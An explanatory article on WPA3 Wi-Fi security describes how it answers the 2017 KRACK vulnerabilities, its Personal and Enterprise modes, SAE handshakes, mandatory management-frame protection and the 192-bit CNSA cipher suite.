At the end of last year 2017, vulnerabilities in WPA and WPA2 security methods were published, marked by the abbreviation KRACK (Key Reinstallation AttaCK) . These events had the effect of accelerating the creation of new methods for secure access and communication in Wi-Fi wireless networks. The Wi-Fi Alliance published them under the name Wi-Fi Protected Access 3 (WPA3).
WPA3 was designed from the ground up to address the vulnerabilities revealed by KRACK using the latest security methods, while adding some interesting functionality that was not in the previous version of WPA.
From a technical point of view, we distinguish two versions of WPA3:
- WPA3-Personal – designed for homes or small Wi-Fi networks
- WPA3-Enterprise – designed for business deployments in networks that also use an AAA (Authentication, Authorization and Accounting) server to verify access to the business network.
WPA3-Personal:
It builds on the same foundations as WPA2 in that, from the user's point of view, the process of connecting users to the network does not change. The whole concept is based on a shared password (called pre-shared key - PSK) between the user and the WiFi infrastructure. WPA3-Personal uses Simultaneous Authentication of Equals (SAE) defined by the IEEE 802.11-2016 standard. SAE automatically adds one step to the initial handshake process to ensure resistance against dictionary attacks and brute force attacks. Another plus is that WPA3 requires the use of encryption on all management frames (PMF - Protected Management Frames). In the past, PMF was an optional feature that an administrator may or may not have enabled on the WiFi network itself. PMF support must be both on the WiFi infrastructure and on the WiFi clients themselves that connect to the network.
WPA3-Enterprise:
It is based on the basics of WPA2-Enterprise and, like WPA3-Personal, WPA3-Enterprise also requires support for frame management encryption (PMF).
WPA3 also introduces a 192-bit cryptographic security suite. This security suite complies with Commercial National Security Algorithm (CNSA) recommendations, and is used mostly in highly secure solutions for government, financial and industrial institutions. This security suite consists of the following features:
- Authenticated encryption: 256-bit Galois/Counter Mode Protocol (GCMP-256)
- Key derivation and confirmation: 384-bit Hashed Message Authentication Mode (HMAC) with Secure Hash Algorithm (HMAC-SHA384)
- Key establishment and authentication: Elliptic Curve Diffie-Hellman (ECDH) exchange and Elliptic Curve Digital Signature Algorithm (ECDSA) using 384-bit elliptic curve
- Robust frame management protection: 256-bit Broadcast/Multicast Integrity Protocol Galois Message Authentication Code (BIP-GMAC-256)
The other two areas that the Wi-Fi Alliance focused on were:
- Safety in the so-called "open" WiFi wireless networks - WiFi networks that do not require any kind of authentication for connection at the line layer and at the same time do not secure user data transmitted by the WiFi network
- Simple and fast connection of IoT (Internet of Things) devices to WiFi wireless networks